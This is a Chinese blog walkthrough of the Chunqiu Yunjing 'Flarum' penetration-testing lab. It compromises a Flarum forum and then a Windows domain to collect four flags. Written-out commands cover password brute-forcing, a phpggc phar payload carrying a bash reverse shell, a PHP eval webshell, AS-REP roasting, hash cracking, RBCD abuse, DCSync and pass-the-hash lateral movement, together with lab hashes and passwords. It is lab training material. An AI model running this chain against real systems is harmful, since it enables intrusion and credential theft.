春秋云境Flarum-WP【一遍过】

已于 2023-10-17 18:06:30 修改
阅读量419 收藏
点赞数 2
分类专栏: 渗透 文章标签: 安全
于 2023-10-17 12:57:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63576152/article/details/133881319
版权

flag01

fscan扫一下

flarum 论坛

用户名为 administrator 或者 administrator@xiaorang.lab

密码用 rockyou.txt 跑(很久),结果是administrator/1chris

接下来按着p牛的博客开始RCE,先下一个phpggc,一种类似于yso但是针对php的反序列化利用工具,这里为了可控文件头,我们使用phpggc来生成tar格式包,里面内容就是反弹shell的命令

php phpggc -p tar -b Monolog/RCE6 system "bash -c 'bash -i >& /dev/tcp/vps/port 0>&1'"
./phpggc -p tar -b Monolog/RCE6 system "bash -c 'bash -i >& /dev/tcp/vps/port 0>&1'"     #这条命令运行了很久都没结果

如果遇到Cannot create phar: phar.readonly is set to 1报错,参考文章,修改参数

将base64代码复制过来,在后台修改css那里替换下面代码的……

@import (inline) 'data:text/css;base64,……';

接着访问一下主页39.xx.xx.xx/assets/forum.css确保css样式已经成功修改

接下来再次修改自定义CSS,使用phar协议包含我们修改的css文件

.test {
    content: data-uri('phar://./assets/forum.css');
}

拿到shell

写个马好上蚁剑(/var/www/html/public/assets目录下才有权限,后面的文件上传也是一样)

echo "<?php @eval(\$_POST[1]);?>" > 1.php

连接蚁剑http://39.xx.xx.xx/assets/1.php

提权

getcap -r / 2>/dev/null

capabilities之openssl,得到flag01

openssl enc -in "/root/flag/flag01.txt"

flag03

上传fscan和frp,开代理

信息收集(蚁剑上fscan不回显)

172.22.60.42:445 open
172.22.60.15:445 open
172.22.60.42:139 open
172.22.60.8:139 open
172.22.60.15:139 open
172.22.60.42:135 open
172.22.60.15:135 open
172.22.60.8:135 open
172.22.60.52:80 open
172.22.60.52:22 open
172.22.60.52:8084 open
172.22.60.52:8083 open
172.22.60.8:88 open
172.22.60.8:445 open
172.22.60.52:8080 open
[*] NetInfo:
[*]172.22.60.15
   [->]PC1
   [->]172.22.60.15
   [->]169.254.204.42
[*] NetBios: 172.22.60.15    XIAORANG\PC1                   
[*] NetBios: 172.22.60.8     [+]DC XIAORANG\DC              
[*] NetInfo:
[*]172.22.60.42
   [->]Fileserver
   [->]172.22.60.42
   [->]169.254.134.157
[*] WebTitle: https://172.22.60.52:8080 code:200 len:260    title:None
[*] NetInfo:
[*]172.22.60.8
   [->]DC
   [->]172.22.60.8
   [->]169.254.114.245
[*] WebTitle: https://172.22.60.52:8084 code:200 len:260    title:None
[*] NetBios: 172.22.60.42    XIAORANG\FILESERVER            
[*] WebTitle: https://172.22.60.52:8083 code:200 len:260    title:None
[*] WebTitle: http://172.22.60.52       code:200 len:5867   title:霄壤社区

得到下面的信息

172.22.60.52 本机
172.22.60.15 PC1域内机器
172.22.60.42 Fileserver域内机器
172.22.60.8  DC域

在config.php中找到数据库密码

root/Mysql@root123

蚁剑连接

导出 flarum 用户的用户名,然后AS-REP Roasting

proxychains impacket-GetNPUsers -dc-ip 172.22.60.8  xiaorang.lab/ -usersfile flarum_users.txt

得到两个hash

'$krb5asrep$23$zhangxin@XIAORANG.LAB:b505f6f8f88b922532bb16ca201e40db$096140933263872ea92b3fb76cd2ee4e85e53bc3d1a84f652a484cc15cc55312399b6ea32da1d6d81b9f59a52890ec5b63fa2c133cafdc0aef37448f969784805528c0f2cb9e7c86d0b644eeddef544a1c29bedc788c6072e0dd4de1625a3f9ee31b4d0a8a18946bc0e59c8c7ea3c6884b28812d4d1a74382a67b19ff26923d3fe4a856c85b08434682c3c303b30577b503d174a82d3223f2b8971d0dbe75f5b7ace377fd1912a3fa5665da3d627dd650ed2abffbc853569ba48a2c3511ee7eed5cacbb3e5af0a258a61689529929542c062754d95b918d0d5ebbe8f4e6795879e69eea2335f6796b2297eb1'
'$krb5asrep$23$wangyun@XIAORANG.LAB:a2452cf31a79b10862f618f1b640afaf$045cd13b5cda191cc51b4b598ae617a2fb2a95d4646a95aeea1b1e20922d7a47f7ad24915714a9c5a243022fabefa0dd2e421d9502cddc17178dae58f54ec50f4d81b0bc082a7334673c623156dbf45c4fe4e2ab3d588c0d24fada9c62ca051e8dc9737069ea3505bf6fd7e21a7bcc82cd5070eab42efcc809a2bb2767c3e97c675553ca5acca6cf9b1872462756055a2512d69db7ef2a9e38c0873af757fd963bc941224ca71627773a28f3740f71c4bb4ebfae37e9e01da6ba7dfef37119df61e53dcb7edf82b3e89b344568b17d87effb105f30c5a87ee592555e5966dee4709742cedabfd86092f05056'

爆破

hashcat -a 0 -m 18200 --force hash.txt rockyou.txt

只能爆出一个,还有个zhangxin爆不出来

wangyun/Adm12geC

远程连接172.22.60.15

wangyun@xiaorang.lab/Adm12geC

跑一下bloodhound

proxychains python3 bloodhound.py -u wangyun -p Adm12geC -d xiaorang.lab -c all -ns 172.22.60.8 --zip --dns-tcp

分析一下

FILESERVER 机器账户具有 DCSync 权限

zhangxin 用户属于 Account Operators 组, 因此对域内非域控的所有机器都具有 GenericAll ACL 权限

那么思路就是通过 zhangxin 对 FILESERVER 配置 RBCD, 然后 DCSync攻击 拿下域控

来看wangyun用户,里面有个xshell

该会话还存储了zhangxin密码,用SharpXDecrypt提取密码(秒出!)

得到密码

UserName: zhangxin
Password: admin4qwY38cc

接下来打RBCD

方法一:

参考域渗透之委派攻击全集里的Acount Operators组用户拿下主机。

Powermad.ps1-->https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1

大佬的博客配置

> Set-ExecutionPolicy Bypass -Scope Process
[Y] 是(Y)  [A] 全是(A)  [N] 否(N)  [L] 全否(L)  [S] 暂停(S)  [?] 帮助 (默认值为“N”): Y
> import-module .\Powermad.ps1
> New-MachineAccount -MachineAccount test -Password $(ConvertTo-SecureString "123456" -AsPlainText -Force)
> import-module .\powerview.ps1
> Get-NetComputer test -Properties objectsid
> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3535393121-624993632-895678587-1116)"
> $SDBytes = New-Object byte[] ($SD.BinaryLength)
> $SD.GetBinaryForm($SDBytes, 0)
> Get-DomainComputer Fileserver| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

报错了?(后来想想应该是连了校园网的缘故,连热点应该就可以了)

修改kali的/ect/hosts,添加ip

172.22.60.15 PC1.xiaorang.lab
172.22.60.42 FILESERVER.xiaorang.lab
172.22.60.8  XIAORANG\DC

申请票据,无密码连接(前面报错了,所以这里利用失败了)

proxychains python3 getST.py -dc-ip 172.22.60.8 xiaorang.lab/test\$:123456 -spn cifs/Fileserver.xiaorang.lab -impersonate administrator
export KRB5CCNAME=administrator.ccache
proxychains python3 psexec.py Administrator@FILESERVER.xiaorang.lab -k -no-pass -dc-ip 172.22.60.8 -codec gbk

方法二:

proxychains python3 addcomputer.py xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8 -dc-host xiaorang.lab -computer-name 'TEST2$' -computer-pass 'P@ssw0rd'
proxychains python3 rbcd.py xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8 -action write -delegate-to 'Fileserver$' -delegate-from 'TEST2$'
proxychains python3 getST.py xiaorang.lab/'TEST2$':'P@ssw0rd' -spn cifs/Fileserver.xiaorang.lab -impersonate Administrator -dc-ip 172.22.60.8
export KRB5CCNAME=Administrator.ccache

修改/etc/hosts

无密码连上去

proxychains python3 psexec.py Administrator@FILESERVER.xiaorang.lab -k -no-pass -dc-ip 172.22.60.8 -codec gbk

flag02 & flag04

抓一下FILESERVER的哈希

proxychains python3 secretsdump.py -k -no-pass Fileserver.xiaorang.lab -dc-ip 172.22.60.8

报错了?

用impacket的secretsdump就可以了,很神奇

proxychains impacket-secretsdump -k -no-pass  FILESERVER.xiaorang.lab -dc-ip 172.22.60.8

得到hash

XIAORANG\Fileserver$:951d8a9265dfb652f42e5c8c497d70dc

利用 Fileserver 机器账户进行 DCSync攻击,得到域控hash

proxychains python3 secretsdump.py xiaorang.lab/'Fileserver$':@172.22.60.8 -hashes ':951d8a9265dfb652f42e5c8c497d70dc' -just-dc-user Administrator

Administratorc3cfdc08527ec4ab6aa3e630e79d349b

横传到域控,拿flag

proxychains python3 wmiexec.py -hashes :c3cfdc08527ec4ab6aa3e630e79d349b Administrator@172.22.60.8 -codec gbk

横传到fileserver,拿flag

proxychains python3 wmiexec.py -hashes :c3cfdc08527ec4ab6aa3e630e79d349b xiaorang.lab/Administrator@172.22.60.15 -codec gbk

Jugg_xie
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
flarum_sso_wp_plugin:WordPress插件使Flarum SSO正常运行
04-10
Flarum SSO WordPress插件 WordPress插件使Flarum SSO正常运行 文献资料 检查以了解有关插件,如何安装和使用它的更多信息。
春秋云境 CVE-2022-4230 夺旗
最新发布
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
春秋云镜-【仿真场景】Certify writeup
渗透测试研究中心
03-07 1058
说明Certify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。技术Solr、AD CS、SMB、Kerberos、域渗透第一个flaglog4j RCE扫描外网IP发现solr存在log4j的组件,测试...
春秋云境系列靶场记录(合集)-不再更新
一只爱吃橙子的羊
11-29 6305
春秋云境系列靶场记录合集,不更新了哈……
春秋云境Time-WP一遍过】
weixin_63576152的博客
10-11 356
重置了很多次靶机,所以靶机ip变化请忽略。
春秋云镜-内网极限挑战赛-Exchange
M1n9K1n9的博客
04-08 2195
看到奖品还有证书,还涉及oscp方面的东西,过来打打 感谢TryHackMe Exchange 是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 Flag,分布于不同的靶机。 由于是付费的,时间就是金钱,为了节省点钱,我只好利用wp来进行半引导式渗透 借此来复习一下TryHackMe
雄迈摄像头模组50HV10PT-WP
08-20
雄迈摄像头模组,50HV10PT-WP,资料整合硬件开发实例。
all-in-one-wp-migration-file-extension.zip
04-07
all-in-one-migration的扩展插件,可以备份更大内存的wordpress站点,500m
BL-WP02G.bin
08-31
BL-WP02G路由器固件 BL-WP02G路由器固件 BL-WP02G路由器固件 BL-WP02G路由器固件
all-in-one-wp-migration:多合一WP迁移-无限制importexport
04-09
多合一WP迁移 无限导入/导出All In One WP迁移版本6.77 学分 马里奥·马尔科维奇(Mario Markovic)
春秋云境】CVE-2022-28512靶场WP
果粒程
11-26 1185
春秋云境】CVE-2022-28512靶场WP
【内网渗透】春秋云镜 Tsclient WP
Sapphire037的博客
05-15 1083
mssql连接和攻击、windows提权、令牌窃取、镜像劫持。
春秋云境Exchange WP
m0_62466350的博客
12-30 971
Exchange 是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 Flag,分布于不同的靶机。*注意:该靶场只有4个flag,如果提交完4个flag后仍未攻克成功,请关闭环境提交反馈。
WP-春秋云境-Tsclient专业徽章通关指南-flag01
qq_45234543的博客
01-04 807
Wp-春秋云镜Tsclient专业徽章Flag01
春秋云境】CVE-2022-2073靶场WP和CVE-2022-1014靶场WP
果粒程
12-08 1455
春秋云境】CVE-2022-2073靶场WP和CVE-2022-1014靶场WP
春秋云境】CVE-2022-23134靶场WP和CVE-2022-22965靶场WP
果粒程
12-05 988
春秋云境】CVE-2022-23134靶场WP和CVE-2022-22965靶场WP
春秋云境】CVE-2021-44983靶场WP和CVE-2021-40282靶场WP
果粒程
12-14 534
春秋云境】CVE-2021-44983靶场WP和CVE-2021-40282靶场WP
ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞 CVE-2015-1427 漏洞复现
ADummy的博客
02-24 825
ElasticSearch 命令执行漏洞(CVE-2014-3120) by ADummy 0x00利用路线 ​ Burpsuite抓包—>java代码放入json—>有回显命令执行 0x01漏洞介绍 ​ CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞:1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞。 ​ jre版本:openjdk:8-jre ​ elasticsearc
春秋云境】CVE-2022-32991靶场wp
热门推荐
MONSTERinCAT的博客
10-11 1万+
10月10日10时24分,基于多年来在网络靶场领域的深厚技术及场景积累,永信至诚i春秋正式发布春秋云境.com社区,以春秋云底层能力为基础,以平行仿真技术为支撑,以高仿真内容场景为核心,打造网络安全实战“元宇宙”,通过更加多元、开放、创新的线上技术交流空间,为更广泛的用户群体提供更轻量的靶场体验,助力攻防两端的实战技能提升。春秋云境.com。
功能安全-阶段-wp6
11-25
WP6是功能安全的阶段之一,根据ISO 26262标准的要求,WP6主要用于实施功能安全的验证和确认,以确保系统能够达到确定的安全性要求。 WP6包括以下主要任务和活动: 1. 验证计划:根据系统的功能安全要求,制定验证...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值